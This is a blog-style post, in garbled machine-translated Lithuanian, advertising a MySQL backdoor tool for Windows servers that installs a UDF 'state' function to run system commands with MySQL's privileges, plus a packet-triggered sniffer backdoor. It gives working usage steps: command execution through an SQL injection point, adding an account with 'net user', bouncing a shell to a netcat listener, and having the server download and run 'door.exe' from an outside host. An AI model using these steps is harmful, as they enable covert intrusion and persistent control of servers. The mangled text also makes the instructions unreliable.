MySQL BackDoor
Šaltinis: Puri Mančesteris
MySQL Backdoor atgal durys plėtros PHP + MySQL serverio MySQL po galines duris, įdiegti papildomas "valstybė" funkcija gali vykdyti sistemos komandas ir pradėti su MySQL proceso, paremto Dll Sniffer tipo galines duris, gudriai suprato, ne uostas, nei procesas, nei per sieną Trojos paslaugos. programa WinXP Win2003 + MYSQL5.0.X, ir pagal pass.
PHP serverio įrengimas bus Mysql.php, išplito į pagal priimančiosios User-Slaptažodis-BP užpildyti, spustelėkite ant "automatinio įdiegti MySQL Backdoor"
Po sėkmingo įdiegimo, MySQL padidėjo "valstybės" funkcija, o MySQL procesas veikia, uostyti šio backdoor užpakalines duris "Windows" turi tas pačias sistemos privilegijas ir MySQL.
Valstybės funkcijų naudojimas
Narė funkcija yra faktiškai PHP sistema () "funkcija ta pati funkcija gali būti naudojama vykdyti sistemos komandas Prašome įvesti į SQL komandą:." Office "ir užpildyti su mysql pareiškimas būtų vykdomas, pavyzdžiui, kaip" pasirinkite valstybę ("neto vartotojo nohack / papildyti "), spauskite" Execute SQL veiks rezultatus.
Su valstybės funkciją, Sniff užpakalines duris, net jei Webshell prarado, kol serverio, SQL injekcijos taškas, mes galime per injekcijos. PHP? Id = 1 ir valstybė ("net user") "metodas atlieka serveryje Komanda Tačiau, jei įpurškimas taškas yra ne tai mes dar vadiname Sniff, atgal durų valdymo serverį siunčiami į serverį, esantį uostą ir į MySQL-"paketo pradžia, bus būti į paskambinti Sniff, galines duris, pvz.:
Veikia sistema komandą: nc IP 80 -> Enter - mysql-cmd / c grynasis vartotojo ABC / add> C :/ log.txt (Pastaba: "!" Paskutinis Negali būti praleidžiamas)
2 20.082 uostas lukšto prie vietinio serverio Bounce: pirmą kartą paleidus nc-lp 20 082, stebėti įrenginio 20082 uostą, ir tada nc IP 80 -> Enter - mysql-c -> įveskite
Leiskite serverio atsisiųstą failą: nc ip 80 -> Enter - mysql-http :/ / www.x.com. / Door.exe-. C mydoor.exe (Pastaba:! Paskutinis "Negali būti praleidžiami)
Be siuntimo "mysql-c", kita komanda nėra aido, bet atitinkamos komandos serveryje veikia.
Pašalinti MySQL run "drop funkcinės būklės" gali būti iškraunami, tačiau tuo pačiu metu bus sukelti MySQL procesas išeiti, grįžti prie normalaus po perkrovimo.










































158 Trackback (-ai)
Jūs turite būti prisijungęs ir parašyk komentarą.